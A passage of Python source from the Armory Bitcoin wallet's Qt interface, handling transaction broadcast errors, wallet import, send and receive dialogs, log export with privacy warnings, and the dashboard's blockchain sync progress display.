self.doTheSystemTrayThing()
#############################################################################
def broadcastTransaction(self, pytx, dryRun=False):
if dryRun:
#DlgDispTxInfo(pytx, None, self, self).exec_()
return
else:
LOGRAWDATA(pytx.serialize(), logging.INFO)
LOGPPRINT(pytx, logging.INFO)
newTxHash = binary_to_hex(pytx.getHash())
self.broadcasting[newTxHash] = pytx
try:
LOGINFO('Sending Tx, %s', newTxHash)
TheBDM.bdv().broadcastZC(pytx.serialize())
except:
QMessageBox.warning(self, self.tr('Broadcast failed'), self.tr(
'The broadcast process failed unexpectedly. Report this error to '
'the development team if this issue occurs repeatedly', QMessageBox.Ok))
#############################################################################
def zcBroadcastError(self, txHash, errorMsg):
try:
pytx = self.broadcasting[txHash]
except:
return
LOGINFO("Failed to broadcast Tx through P2P")
isTimeoutError = False
errorMsgFromRPC = None
if errorMsg.startswith("tx broadcast timed out"):
isTimeoutError = True
try:
errorMsgFromRPC = TheBDM.bdv().broadcastThroughRPC(pytx.serialize())
if errorMsgFromRPC == "success":
QMessageBox.warning(self, self.tr('Transaction Broadcast'), self.tr(
'Your Transaction failed to broadcast through the P2P layer but '
'successfully broadcasted through the RPC. This can be a symptom '
'of bad node connectivity to the Bitcoin network, or that your '
'node is overwhelmed by network traffic. If you consistently get '
'this warning, report to the developers for assistance with node '
'maintenance.'),
QMessageBox.Ok)
return
except:
LOGERROR("Node RPC is disabled")
LOGERROR('Transaction was not accepted by the Satoshi client')
LOGERROR('Raw transaction:')
LOGRAWDATA(pytx.serialize(), logging.ERROR)
LOGERROR('Transaction details')
LOGPPRINT(pytx, logging.ERROR)
LOGERROR('Failure message: %s' % (errorMsg))
searchstr = binary_to_hex(txHash, BIGENDIAN)
supportURL = 'https://github.com/goatpig/BitcoinArmory/issues'
blkexplURL = BLOCKEXPLORE_URL_TX % searchstr
blkexplURL_short = BLOCKEXPLORE_URL_TX % searchstr[:20]
if not isTimeoutError:
QMessageBox.warning(self, self.tr('Transaction Not Accepted'), self.tr(
'The transaction that you just executed failed with '
'the following error message: <br><br> '
'<b>%1</b>'
'<br><br>'
'<br><br>On time out errors, the transaction may have actually succeeded '
'and this message is displayed prematurely. To confirm whether the '
'the transaction actually succeeded, you can try this direct link '
'to %2: '
'<br><br>'
'<a href="%3">%4...</a>'
'<br><br>'
'If you do not see the '
'transaction on that webpage within one minute, it failed and you '
'should attempt to re-send it. '
'If it <i>does</i> show up, then you do not need to do anything '
'else -- it will show up in Armory as soon as it receives one '
'confirmation. '
'<br><br>If the transaction did fail, it is likely because the fee '
'is too low. Try again with a higher fee. '
'If the problem persists, go to "<i>File</i>" -> '
'"<i>Export Log File</i>" and then attach it to a support '
'ticket at <a href="%5">%5</a>').arg(errorMsg, BLOCKEXPLORE_NAME, blkexplURL, \
blkexplURL_short, supportURL), QMessageBox.Ok)
else:
if errorMsgFromRPC == None:
LOGERROR('Broadcast error: %s' % errorMsg)
QMessageBox.warning(self, self.tr('Transaction Not Accepted'), self.tr(
'The transaction that you just attempted to broadcast has timed out. '
'<br><br>'
'The RPC interface of your node is disabled, therefor Armory cannot '
'use it to gather more information about the timeout. It is '
'recommended that you enable the RPC and try again.'
), QMessageBox.Ok)
else:
LOGERROR('Broadcast error: %s' % errorMsgFromRPC)
QMessageBox.warning(self, self.tr('Transaction Not Accepted'), self.tr(
'The transaction that you just attempted to broadcast has failed with '
'the following error: '
'<br><br><b>%1</b>'
).arg(errorMsgFromRPC), QMessageBox.Ok)
#############################################################################
def warnNoImportWhileScan(self):
extraMsg = ''
if not self.usermode==USERMODE.Standard:
extraMsg = ('<br><br>' + \
self.tr('In the future, you may avoid scanning twice by '
'starting Armory in offline mode (--offline), and '
'perform the import before switching to online mode.'))
QMessageBox.warning(self, self.tr('Armory is Busy'), \
self.tr('Wallets and addresses cannot be imported while Armory is in '
'the middle of an existing blockchain scan. Please wait for '
'the scan to finish. ') + extraMsg, QMessageBox.Ok)
#############################################################################
def execImportWallet(self):
sdm = TheSDM.getSDMState()
bdm = TheBDM.getState()
if sdm in ['BitcoindInitializing', \
'BitcoindSynchronizing'] or \
bdm in [BDM_SCANNING]:
QMessageBox.warning(self, self.tr('Scanning'), self.tr(
'Armory is currently in the middle of scanning the blockchain for '
'your existing wallets. New wallets cannot be imported until this '
'operation is finished.'), QMessageBox.Ok)
return
DlgUniversalRestoreSelect(self, self).exec_()
#############################################################################
def execGetImportWltName(self):
fn = self.getFileLoad('Import Wallet File')
if not os.path.exists(fn):
return
wlt = PyBtcWallet().readWalletFile(fn, verifyIntegrity=False)
wltID = wlt.uniqueIDB58
wlt = None
if self.walletMap.has_key(wltID):
QMessageBox.warning(self, self.tr('Duplicate Wallet!'), self.tr(
'You selected a wallet that has the same ID as one already '
'in your wallet (%1)! If you would like to import it anyway, '
'please delete the duplicate wallet in Armory, first.').arg(wltID), \
QMessageBox.Ok)
return
fname = self.getUniqueWalletFilename(fn)
newpath = os.path.join(ARMORY_HOME_DIR, fname)
LOGINFO('Copying imported wallet to: %s', newpath)
shutil.copy(fn, newpath)
newWlt = PyBtcWallet().readWalletFile(newpath)
newWlt.fillAddressPool()
self.addWalletToApplication(newWlt)
#############################################################################
def digitalBackupWarning(self):
reply = QMessageBox.warning(self, self.tr('Be Careful!'), self.tr(
'<font color="red"><b>WARNING:</b></font> You are about to make an '
'<u>unencrypted</u> backup of your wallet. It is highly recommended '
'that you do <u>not</u> ever save unencrypted wallets to your regular '
'hard drive. This feature is intended for saving to a USB key or '
'other removable media.'), QMessageBox.Ok | QMessageBox.Cancel)
return (reply==QMessageBox.Ok)
#############################################################################
def execAddressBook(self):
if TheBDM.getState()==BDM_SCANNING:
QMessageBox.warning(self, self.tr('Blockchain Not Ready'), self.tr(
'The address book is created from transaction data available in '
'the blockchain, which has not finished loading. The address '
'book will become available when Armory is online.'), QMessageBox.Ok)
elif TheBDM.getState() in (BDM_UNINITIALIZED,BDM_OFFLINE):
QMessageBox.warning(self, self.tr('Blockchain Not Ready'), self.tr(
'The address book is created from transaction data available in '
'the blockchain, but Armory is currently offline. The address '
'book will become available when Armory is online.'), QMessageBox.Ok)
else:
if len(self.walletMap)==0:
QMessageBox.warning(self, self.tr('No wallets!'), self.tr('You have no wallets so '
'there is no address book to display.'), QMessageBox.Ok)
return
DlgAddressBook(self, self, None, None, None).exec_()
#############################################################################
def getUniqueWalletFilename(self, wltPath):
root,fname = os.path.split(wltPath)
base,ext = os.path.splitext(fname)
if not ext=='.wallet':
fname = base+'.wallet'
currHomeList = os.listdir(ARMORY_HOME_DIR)
newIndex = 2
while fname in currHomeList:
# If we already have a wallet by this name, must adjust name
base,ext = os.path.splitext(fname)
fname='%s_%02d.wallet'%(base, newIndex)
newIndex+=1
if newIndex==99:
raise WalletExistsError('Cannot find unique filename for wallet.'
'Too many duplicates!')
return fname
#############################################################################
def addrViewDblClicked(self, index, wlt):
uacfv = lambda x: self.updateAddressCommentFromView(self.wltAddrView, self.wlt)
#############################################################################
def dblClickLedger(self, index):
if index.column()==LEDGERCOLS.Comment:
self.updateTxCommentFromView(self.ledgerView)
else:
self.showLedgerTx()
#############################################################################
def showLedgerTx(self):
row = self.ledgerView.selectedIndexes()[0].row()
txHash = str(self.ledgerView.model().index(row, LEDGERCOLS.TxHash).data().toString())
wltID = str(self.ledgerView.model().index(row, LEDGERCOLS.WltID).data().toString())
txtime = unicode(self.ledgerView.model().index(row, LEDGERCOLS.DateStr).data().toString())
pytx = None
txHashBin = hex_to_binary(txHash)
cppTx = TheBDM.bdv().getTxByHash(txHashBin)
if cppTx.isInitialized():
pytx = PyTx().unserialize(cppTx.serialize())
pytx.setRBF(cppTx.isRBF())
if pytx==None:
QMessageBox.critical(self, self.tr('Invalid Tx'), self.tr(
'The transaction you requested be displayed does not exist in '
'Armory\'s database. This is unusual...'), QMessageBox.Ok)
return
DlgDispTxInfo( pytx, self.walletMap[wltID], self, self, txtime=txtime).exec_()
#############################################################################
def showContextMenuLedger(self):
menu = QMenu(self.ledgerView)
if len(self.ledgerView.selectedIndexes())==0:
return
row = self.ledgerView.selectedIndexes()[0].row()
wltID = str(self.ledgerView.model().index(row, LEDGERCOLS.WltID).data().toString())
txHash = str(self.ledgerView.model().index(row, LEDGERCOLS.TxHash).data().toString())
txHash = hex_switchEndian(txHash)
amount, flag = self.ledgerView.model().index(row, LEDGERCOLS.Amount).data().toFloat()
rbf = self.ledgerView.model().index(row, LEDGERCOLS.optInRBF).data().toBool()
issts = self.ledgerView.model().index(row, LEDGERCOLS.toSelf).data().toBool()
flagged = rbf and (amount < 0 or issts)
if flagged:
actBump = menu.addAction(self.tr("Bump Fee"))
actViewTx = menu.addAction(self.tr("View Details"))
actViewBlkChn = menu.addAction(self.tr("View on %1").arg(BLOCKEXPLORE_NAME))
actComment = menu.addAction(self.tr("Change Comment"))
actCopyTxID = menu.addAction(self.tr("Copy Transaction ID"))
actOpenWallet = menu.addAction(self.tr("Open Relevant Wallet"))
action = menu.exec_(QCursor.pos())
if action==actViewTx:
self.showLedgerTx()
elif action==actViewBlkChn:
try:
DlgBrowserWarn(BLOCKEXPLORE_URL_TX % txHash).exec_()
except:
LOGEXCEPT('Failed to open webbrowser')
QMessageBox.critical(self, self.tr('Could not open browser'), self.tr(
'Armory encountered an error opening your web browser. To view '
'this transaction on blockchain.info, please copy and paste '
'the following URL into your browser: '
'<br><br>%1').arg(BLOCKEXPLORE_URL_TX % txHash), QMessageBox.Ok)
elif action==actCopyTxID:
clipb = QApplication.clipboard()
clipb.clear()
clipb.setText(txHash)
elif action==actComment:
self.updateTxCommentFromView(self.ledgerView)
elif action==actOpenWallet:
DlgWalletDetails(self.getSelectedWallet(), self.usermode, self, self).exec_()
elif flagged and action==actBump:
txHash = hex_switchEndian(txHash)
self.bumpFee(wltID, txHash)
#############################################################################
def getSelectedWallet(self):
wltID = None
if len(self.walletMap) > 0:
wltID = self.walletMap.keys()[0]
wltSelect = self.walletsView.selectedIndexes()
if len(wltSelect) > 0:
row = wltSelect[0].row()
wltID = str(self.walletsView.model().index(row, WLTVIEWCOLS.ID).data().toString())
# Starting the send dialog with or without a wallet
return None if wltID == None else self.walletMap[wltID]
def clickSendBitcoins(self):
if TheBDM.getState() in (BDM_OFFLINE, BDM_UNINITIALIZED):
QMessageBox.warning(self, self.tr('Offline Mode'), self.tr(
'Armory is currently running in offline mode, and has no '
'ability to determine balances or create transactions. '
'<br><br>'
'In order to send coins from this wallet you must use a '
'full copy of this wallet from an online computer, '
'or initiate an "offline transaction" using a watching-only '
'wallet on an online computer.'), QMessageBox.Ok)
return
elif TheBDM.getState()==BDM_SCANNING:
QMessageBox.warning(self, self.tr('Armory Not Ready'), self.tr(
'Armory is currently scanning the blockchain to collect '
'the information needed to create transactions. This typically '
'takes between one and five minutes. Please wait until your '
'balance appears on the main window, then try again.'), \
QMessageBox.Ok)
return
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'), self.tr(
'You cannot send any bitcoins until you create a wallet and '
'receive some coins. Would you like to create a wallet?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
else:
DlgSendBitcoins(self.getSelectedWallet(), self, self).exec_()
#############################################################################
def uriSendBitcoins(self, uriDict):
# Because Bitcoin Core doesn't store the message= field we have to assume
# that the label field holds the Tx-info. So we concatenate them for
# the display message
uri_has = lambda s: uriDict.has_key(s)
haveLbl = uri_has('label')
haveMsg = uri_has('message')
newMsg = ''
if haveLbl and haveMsg:
newMsg = uriDict['label'] + ': ' + uriDict['message']
elif not haveLbl and haveMsg:
newMsg = uriDict['message']
elif haveLbl and not haveMsg:
newMsg = uriDict['label']
descrStr = self.tr('You just clicked on a "bitcoin:" link requesting bitcoins '
'to be sent to the following address:<br> ')
descrStr += self.tr('<br>--<b>Address</b>:\t%1 ').arg(uriDict['address'])
#if uri_has('label'):
#if len(uriDict['label'])>30:
#descrStr += '(%s...)' % uriDict['label'][:30]
#else:
#descrStr += '(%s)' % uriDict['label']
amt = 0
if uri_has('amount'):
amt = uriDict['amount']
amtstr = coin2str(amt, maxZeros=1)
descrStr += self.tr('<br>--<b>Amount</b>:\t%1 BTC').arg(amtstr)
if newMsg:
if len(newMsg)>60:
descrStr += self.tr('<br>--<b>Message</b>:\t%1...').arg(newMsg[:60])
else:
descrStr += self.tr('<br>--<b>Message</b>:\t%1').arg(newMsg)
uriDict['message'] = newMsg
if not uri_has('amount'):
descrStr += (self.tr('<br><br>There is no amount specified in the link, so '
'you can decide the amount after selecting a wallet to use '
'for this transaction. '))
else:
descrStr += self.tr('<br><br><b>The specified amount <u>can</u> be changed</b> on the '
'next screen before hitting the "Send" button. ')
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'), self.tr(
'You just clicked on a "bitcoin:" link to send money, but you '
'currently have no wallets! Would you like to create a wallet '
'now?'), QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return False
else:
dlg = DlgSendBitcoins(self.getSelectedWallet(), self, self)
dlg.frame.prefillFromURI(uriDict)
dlg.exec_()
return True
#############################################################################
def clickReceiveCoins(self):
loading = None
QAPP.processEvents()
wltID = None
selectionMade = True
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'), self.tr(
'You have not created any wallets which means there is '
'nowhere to store your bitcoins! Would you like to '
'create a wallet now?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return
elif len(self.walletMap)==1:
loading = LoadingDisp(self, self)
loading.show()
wltID = self.walletMap.keys()[0]
else:
wltSelect = self.walletsView.selectedIndexes()
if len(wltSelect)>0:
row = wltSelect[0].row()
wltID = str(self.walletsView.model().index(row, WLTVIEWCOLS.ID).data().toString())
dlg = DlgWalletSelect(self, self, self.tr('Receive coins with wallet...'), '', \
firstSelect=wltID, onlyMyWallets=False)
if dlg.exec_():
loading = LoadingDisp(self, self)
loading.show()
wltID = dlg.selectedID
else:
selectionMade = False
if selectionMade:
wlt = self.walletMap[wltID]
wlttype = determineWalletType(wlt, self)[0]
if showRecvCoinsWarningIfNecessary(wlt, self, self):
QAPP.processEvents()
dlg = DlgNewAddressDisp(wlt, self, self, loading)
dlg.exec_()
#############################################################################
def sysTrayActivated(self, reason):
if reason==QSystemTrayIcon.DoubleClick:
self.bringArmoryToFront()
#############################################################################
def bringArmoryToFront(self):
self.show()
self.setWindowState(Qt.WindowActive)
self.activateWindow()
self.raise_()
#############################################################################
def minimizeArmory(self):
LOGDEBUG('Minimizing Armory')
self.hide()
self.sysTray.show()
#############################################################################
def startWalletWizard(self):
walletWizard = WalletWizard(self, self)
walletWizard.exec_()
#############################################################################
def startTxWizard(self, prefill=None, onlyOfflineWallets=False):
txWizard = TxWizard(self, self, self.getSelectedWallet(), prefill, onlyOfflineWallets=onlyOfflineWallets)
txWizard.exec_()
#############################################################################
def exportLogFile(self):
LOGDEBUG('exportLogFile')
if self.logFilePrivacyWarning(wCancel=True):
self.saveCombinedLogFile()
#############################################################################
def logFileTriplePrivacyWarning(self):
return MsgBoxCustom(MSGBOX.Warning, self.tr('Privacy Warning'), self.tr(
'<b><u><font size=3>Wallet Analysis Log Files</font></u></b> '
'<br><br> '
'The wallet analysis logs contain no personally-identifiable '
'information, only a record of errors and inconsistencies '
'found in your wallet file. No private keys or even public '
'keys are included. '
'<br><br>'
'<b><u><font size=3>Regular Log Files</font></u></b>'
'<br><br>'
'The regular log files do not contain any <u>security</u>-sensitive '
'information, but some users may consider the information to be '
'<u>privacy</u>-sensitive. The log files may identify some addresses '
'and transactions that are related to your wallets. It is always '
'recommended you include your log files with any request to the '
'Armory team, unless you are uncomfortable with the privacy '
'implications. '
'<br><br>'
'<b><u><font size=3>Watching-only Wallet</font></u></b> '
'<br><br>'
'A watching-only wallet is a copy of a regular wallet that does not '
'contain any signing keys. This allows the holder to see the balance '
'and transaction history of the wallet, but not spend any of the funds. '
'<br><br> '
'You may be requested to submit a watching-only copy of your wallet '
'to make sure that there is no '
'risk to the security of your funds. You should not even consider '
'sending your '
'watching-only wallet unless it was specifically requested by an '
'Armory representative.'), yesStr="&Ok")
#############################################################################
def logFilePrivacyWarning(self, wCancel=False):
return MsgBoxCustom(MSGBOX.Warning, self.tr('Privacy Warning'), self.tr(
'Armory log files do not contain any <u>security</u>-sensitive '
'information, but some users may consider the information to be '
'<u>privacy</u>-sensitive. The log files may identify some addresses '
'and transactions that are related to your wallets. '
'<br><br> '
'<b>No signing-key data is ever written to the log file</b>. '
'Only enough data is there to help the Armory developers '
'track down bugs in the software, but it may still be considered '
'sensitive information to some users. '
'<br><br>'
'Please do not send the log file to the Armory developers if you '
'are not comfortable with the privacy implications! However, if you '
'do not send the log file, it may be very difficult or impossible '
'for us to help you with your problem.'), wCancel=wCancel, yesStr="&Ok")
#############################################################################
def saveCombinedLogFile(self, saveFile=None):
if saveFile is None:
# TODO: Interleave the C++ log and the python log.
# That could be a lot of work!
defaultFN = 'armorylog_%s.txt' % \
unixTimeToFormatStr(RightNow(),'%Y%m%d_%H%M')
saveFile = self.getFileSave(title='Export Log File', \
ffilter=['Text Files (*.txt)'], \
defaultFilename=defaultFN)
if len(unicode(saveFile)) > 0:
fout = open(saveFile, 'wb')
fout.write(getLastBytesOfFile(ARMORY_LOG_FILE, 256*1024))
fout.write(getLastBytesOfFile(ARMCPP_LOG_FILE, 256*1024))
fout.write(getLastBytesOfFile(ARMDB_LOG_FILE, 256*1024))
fout.close()
LOGINFO('Log saved to %s', saveFile)
#############################################################################
def blinkTaskbar(self):
self.activateWindow()
#############################################################################
def lookForBitcoind(self):
LOGDEBUG('lookForBitcoind')
if TheSDM.satoshiIsAvailable():
return 'Running'
self.setSatoshiPaths()
try:
TheSDM.setupSDM(extraExeSearch=self.satoshiExeSearchPath)
except:
LOGEXCEPT('Error setting up SDM')
pass
if TheSDM.failedFindExe:
return 'StillMissing'
return 'AllGood'
#############################################################################
def executeModeSwitch(self):
LOGDEBUG('executeModeSwitch')
if TheSDM.getSDMState() == 'BitcoindExeMissing':
bitcoindStat = self.lookForBitcoind()
if bitcoindStat=='Running':
result = QMessageBox.warning(self, self.tr('Already running!'), self.tr(
'The Bitcoin software appears to be installed now, but it '
'needs to be closed for Armory to work. Would you like Armory '
'to close it for you?'), QMessageBox.Yes | QMessageBox.No)
if result==QMessageBox.Yes:
self.closeExistingBitcoin()
self.startBitcoindIfNecessary()
elif bitcoindStat=='StillMissing':
QMessageBox.warning(self, self.tr('Still Missing'), self.tr(
'The Bitcoin software still appears to be missing. If you '
'just installed it, then please adjust your settings to point '
'to the installation directory.'), QMessageBox.Ok)
self.startBitcoindIfNecessary()
elif self.doAutoBitcoind and not TheSDM.isRunningBitcoind():
if TheSDM.satoshiIsAvailable():
result = QMessageBox.warning(self, self.tr('Still Running'), self.tr(
'Bitcoin Core is still running. Armory cannot start until '
'it is closed. Do you want Armory to close it for you?'), \
QMessageBox.Yes | QMessageBox.No)
if result==QMessageBox.Yes:
self.closeExistingBitcoin()
self.startBitcoindIfNecessary()
else:
self.startBitcoindIfNecessary()
elif TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
try:
TheBDM.goOnline()
self.switchNetworkMode(NETWORKMODE.Full)
except Cpp.NoArmoryDBExcept:
self.switchNetworkMode(NETWORKMODE.Offline)
else:
LOGERROR('ModeSwitch button pressed when it should be disabled')
time.sleep(0.3)
self.setDashboardDetails()
#############################################################################
def setupDashboard(self):
LOGDEBUG('setupDashboard')
self.lblBusy = QLabel('')
self.btnModeSwitch = QPushButton('')
self.connect(self.btnModeSwitch, SIGNAL('clicked()'), \
self.executeModeSwitch)
# Will switch this to array/matrix of widgets if I get more than 2 rows
self.lblDashModeSync = QRichLabel('',doWrap=False)
self.lblDashModeSync.setText( self.tr('Node Status'), \
size=4, bold=True, color='Foreground')
self.lblDashModeBuild = QRichLabel('',doWrap=False)
self.lblDashModeScan = QRichLabel('',doWrap=False)
self.lblDashModeSync.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeBuild.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeScan.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.barProgressSync = QProgressBar(self)
self.barProgressBuild = QProgressBar(self)
self.barProgressScan = QProgressBar(self)
self.barProgressSync.setRange(0,100)
self.barProgressScan.setRange(0,100)
twid = relaxedSizeStr(self,'99 seconds')[0]
self.lblTimeLeftSync = QRichLabel('')
self.lblTimeLeftBuild = QRichLabel('')
self.lblTimeLeftScan = QRichLabel('')
self.lblTimeLeftSync.setMinimumWidth(twid)
self.lblTimeLeftScan.setMinimumWidth(twid)
layoutDashMode = QGridLayout()
layoutDashMode.addWidget(self.lblDashModeSync, 2,0)
layoutDashMode.addWidget(self.barProgressSync, 2,1)
layoutDashMode.addWidget(self.lblTimeLeftSync, 2,2)
layoutDashMode.addWidget(self.lblDashModeBuild, 3,0)
layoutDashMode.addWidget(self.barProgressBuild, 3,1)
layoutDashMode.addWidget(self.lblTimeLeftBuild, 3,2)
layoutDashMode.addWidget(self.lblDashModeScan, 4,0)
layoutDashMode.addWidget(self.barProgressScan, 4,1)
layoutDashMode.addWidget(self.lblTimeLeftScan, 4,2)
layoutDashMode.addWidget(self.lblBusy, 0,3, 5,1)
layoutDashMode.addWidget(self.btnModeSwitch, 0,3, 5,1)
self.frmDashModeSub = QFrame()
self.frmDashModeSub.setFrameStyle(STYLE_SUNKEN)
self.frmDashModeSub.setLayout(layoutDashMode)
self.frmDashMode = makeHorizFrame(['Stretch', \
self.frmDashModeSub, \
'Stretch'])
self.lblDashDescr1 = QRichLabel('')
self.lblDashDescr2 = QRichLabel('')
for lbl in [self.lblDashDescr1, self.lblDashDescr2]:
# One textbox above buttons, one below
lbl.setStyleSheet('padding: 5px')
qpal = lbl.palette()
qpal.setColor(QPalette.Base, Colors.Background)
lbl.setPalette(qpal)
lbl.setOpenExternalLinks(True)
# Set up an array of buttons in the middle of the dashboard, to be used
# to help the user install bitcoind.
self.lblDashBtnDescr = QRichLabel('')
self.lblDashBtnDescr.setOpenExternalLinks(True)
BTN,LBL,TTIP = range(3)
self.dashBtns = [[None]*3 for i in range(3)]
self.dashBtns[DASHBTNS.Close ][BTN] = QPushButton(self.tr('Close Bitcoin Process'))
self.dashBtns[DASHBTNS.Browse ][BTN] = QPushButton(self.tr('Open https://bitcoin.org'))
self.dashBtns[DASHBTNS.Settings][BTN] = QPushButton(self.tr('Change Settings'))
# The "Now shutting down" frame
self.lblShuttingDown = QRichLabel('', doWrap=False)
self.lblShuttingDown.setText(self.tr('Preparing to shut down..'), \
size=4, bold=True, color='Foreground')
self.lblShuttingDown.setAlignment(Qt.AlignCenter | Qt.AlignVCenter)
layoutDashExit = QGridLayout()
layoutDashExit.addWidget(self.lblShuttingDown, 0,0, 0, 1)
self.frmDashSubExit = QFrame()
self.frmDashSubExit.setFrameStyle(STYLE_SUNKEN)
self.frmDashSubExit.setLayout(layoutDashExit)
self.frmDashSubExit = makeHorizFrame(['Stretch', \
self.frmDashSubExit, \
'Stretch'])
#####
def openBitcoinOrg():
DlgBrowserWarn('https://bitcoin.org/en/download').exec_()
self.connect(self.dashBtns[DASHBTNS.Close][BTN], SIGNAL('clicked()'), \
self.closeExistingBitcoin)
self.connect(self.dashBtns[DASHBTNS.Browse][BTN], SIGNAL('clicked()'), \
openBitcoinOrg)
self.connect(self.dashBtns[DASHBTNS.Settings][BTN], SIGNAL('clicked()'), \
self.openSettings)
self.dashBtns[DASHBTNS.Close][LBL] = QRichLabel( \
self.tr('Stop existing Bitcoin processes so that Armory can open its own'))
self.dashBtns[DASHBTNS.Browse][LBL] = QRichLabel( \
self.tr('Open browser to Bitcoin webpage to download and install Bitcoin software'))
self.dashBtns[DASHBTNS.Settings][LBL] = QRichLabel( \
self.tr('Open Armory settings window to change Bitcoin software management'))
self.dashBtns[DASHBTNS.Browse][TTIP] = self.createToolTipWidget( self.tr(
'Will open your default browser to https://bitcoin.org where you can '
'download the latest version of Bitcoin Core, and get other information '
'and links about Bitcoin, in general.'))
self.dashBtns[DASHBTNS.Settings][TTIP] = self.createToolTipWidget( self.tr(
'Change Bitcoin Core/bitcoind management settings or point Armory to '
'a non-standard Bitcoin installation'))
self.dashBtns[DASHBTNS.Close][TTIP] = self.createToolTipWidget( self.tr(
'Armory has detected a running Bitcoin Core or bitcoind instance and '
'will force it to exit'))
self.frmDashMgmtButtons = QFrame()
self.frmDashMgmtButtons.setFrameStyle(STYLE_SUNKEN)
layoutButtons = QGridLayout()
layoutButtons.addWidget(self.lblDashBtnDescr, 0,0, 1,3)
for r in range(3):
for c in range(3):
if c==LBL:
wMin = tightSizeNChar(self, 50)[0]
self.dashBtns[r][c].setMinimumWidth(wMin)
layoutButtons.addWidget(self.dashBtns[r][c], r+1,c)
self.frmDashMgmtButtons.setLayout(layoutButtons)
self.frmDashMidButtons = makeHorizFrame(['Stretch', \
self.frmDashMgmtButtons,
'Stretch'])
dashLayout = QVBoxLayout()
dashLayout.addWidget(self.frmDashSubExit)
dashLayout.addWidget(self.frmDashMode)
dashLayout.addWidget(self.lblDashDescr1)
dashLayout.addWidget(self.frmDashMidButtons )
dashLayout.addWidget(self.lblDashDescr2)
dashLayout.addWidget(self.lblDashDescr2)
frmInner = QFrame()
frmInner.setLayout(dashLayout)
self.dashScrollArea = QScrollArea()
self.dashScrollArea.setWidgetResizable(True)
self.dashScrollArea.setWidget(frmInner)
scrollLayout = QVBoxLayout()
scrollLayout.addWidget(self.dashScrollArea)
self.tabDashboard.setLayout(scrollLayout)
self.frmDashSubExit.setVisible(False)
#############################################################################
def closeExistingBitcoin(self):
for proc in psutil.process_iter():
try:
if proc.name().lower() in ['bitcoind.exe','bitcoin-qt.exe',\
'bitcoind','bitcoin-qt']:
killProcess(proc.pid)
time.sleep(2)
return
# If the block above rasises access denied or anything else just skip it
except:
pass
# If got here, never found it
QMessageBox.warning(self, self.tr('Not Found'), self.tr(
'Attempted to kill the running Bitcoin Core/bitcoind instance, '
'but it was not found.'), QMessageBox.Ok)
#############################################################################
def getPercentageFinished(self, maxblk, lastblk):
curr = EstimateCumulativeBlockchainSize(lastblk)
maxb = EstimateCumulativeBlockchainSize(maxblk)
return float(curr)/float(maxb)
#############################################################################
def showShuttingDownMessage(self):
self.isShuttingDown = True
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
self.frmDashSubExit.setVisible(True)
self.frmDashMode.setVisible(False)
self.lblDashDescr1.setVisible(False)
self.frmDashMidButtons.setVisible(False)
self.lblDashDescr2.setVisible(False)
self.lblDashDescr2.setVisible(False)
#############################################################################
def updateSyncProgress(self):
if self.isShuttingDown:
return
sdmState = TheSDM.getSDMState()
sdmStr = TheSDM.getSDMStateStr()
if TheBDM.getState()==BDM_SCANNING:
self.lblDashModeSync.setVisible(False)
self.barProgressSync.setVisible(False)
self.lblTimeLeftSync.setVisible(False)
self.lblDashModeSync.setVisible(self.doAutoBitcoind)
self.barProgressSync.setVisible(self.doAutoBitcoind)
self.barProgressSync.setValue(100)
self.lblTimeLeftSync.setVisible(False)
self.barProgressSync.setFormat('')
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.lblTimeLeftBuild.setVisible(True)
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(False)
phase,pct,tleft,numericProgress = TheBDM.predictLoadTime()
if phase==Cpp.BDMPhase_DBHeaders:
self.lblDashModeBuild.setText( self.tr('Loading Database Headers'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_OrganizingChain:
self.lblDashModeBuild.setText( self.tr('Organizing Blockchain'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
self.barProgressBuild.setValue(0)
self.barProgressBuild.setRange(0,0)
self.lblTimeLeftBuild.setVisible(False)
self.lblTimeLeftScan.setVisible(False)
elif phase==Cpp.BDMPhase_BlockHeaders:
self.lblDashModeBuild.setText( self.tr('Reading New Block Headers'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_BlockData:
self.lblDashModeBuild.setText( self.tr('Building Databases'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_Rescan:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Scanning Transaction History'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.barProgressScan.setFormat('%p%')
elif phase==Cpp.BDMPhase_Balance:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Computing Balances'), \
size=4, bold=True, color='Foreground')
self.barProgressBuild.setFormat('')
